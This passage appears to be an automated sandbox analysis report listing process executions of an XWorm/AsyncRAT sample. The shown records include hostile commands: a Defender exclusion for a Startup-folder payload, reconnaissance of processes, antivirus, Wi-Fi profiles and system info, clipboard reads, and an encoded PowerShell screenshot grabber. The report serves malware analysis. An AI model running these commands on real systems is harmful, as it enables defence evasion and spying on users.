                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:05:21:24
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                                                                                                File size:71'168 bytes
                                                                                                                                                                                                                                MD5 hash:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:05:21:25
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:05:21:26
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                Imagebase:0x7ff781d20000
                                                                                                                                                                                                                                File size:576'000 bytes
                                                                                                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:systeminfo
                                                                                                                                                                                                                                Imagebase:0x7ff708870000
                                                                                                                                                                                                                                File size:110'080 bytes
                                                                                                                                                                                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff7cb010000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
